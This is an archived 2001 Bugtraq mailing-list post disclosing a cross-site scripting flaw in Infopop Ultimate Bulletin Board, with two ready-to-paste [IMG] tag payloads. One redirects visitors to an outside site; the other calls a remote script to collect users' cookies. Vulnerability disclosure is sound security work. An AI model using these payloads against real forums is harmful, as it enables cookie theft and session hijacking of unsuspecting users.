Cross-site scripting vulnerability in Infopop Ultimate Bulletin Board (UBB) before 5.47e allows remote attackers to steal user cookies via an [IMG] tag that references an about: URL with an onerror field.

**\[prev in list\] \[next in list\] \[prev in thread\] \[next in thread\]** 
**List:       bugtraq
Subject:    UBB vulnerablietis + about: using example
From:       kyprizel <kyprizel () hostel ! tusur ! ru>
Date:       2001-11-15 19:10:50
\[Download RAW message or body\]**

������������, ���������(��) bugtraq,
  Posting something like this UBB tag:
  \[IMG\]http://about:test"onerror="top.location.href='http://punk.tomsk.ru';\[/IMG\]
  to Infopop Ultimate Bulletin
  Board, we are able to redirect users browser to http://punk.tomsk.ru
  There are many ways to stole cookies using this vulnerabliety, one
  of them:
  \[IMG\]http://about:test"onerror="this.src='http://somedomain.com/yourscript.php';\[/IMG\]
   and yourscript.php - is a script to recieve users cookies 8)
  
  


  --
 // �.������ AKA kyprizel                        mailto:kyprizel@hostel.tusur.ru
                                                 ICQ#3337333
  --
 "Knowlege itself is power..."
  F.Bacon
  --

**\[prev in list\] \[next in list\] \[prev in thread\] \[next in thread\]** 

  

Configure | About | News | Add a list | Sponsored by KoreLogic

Tag

#php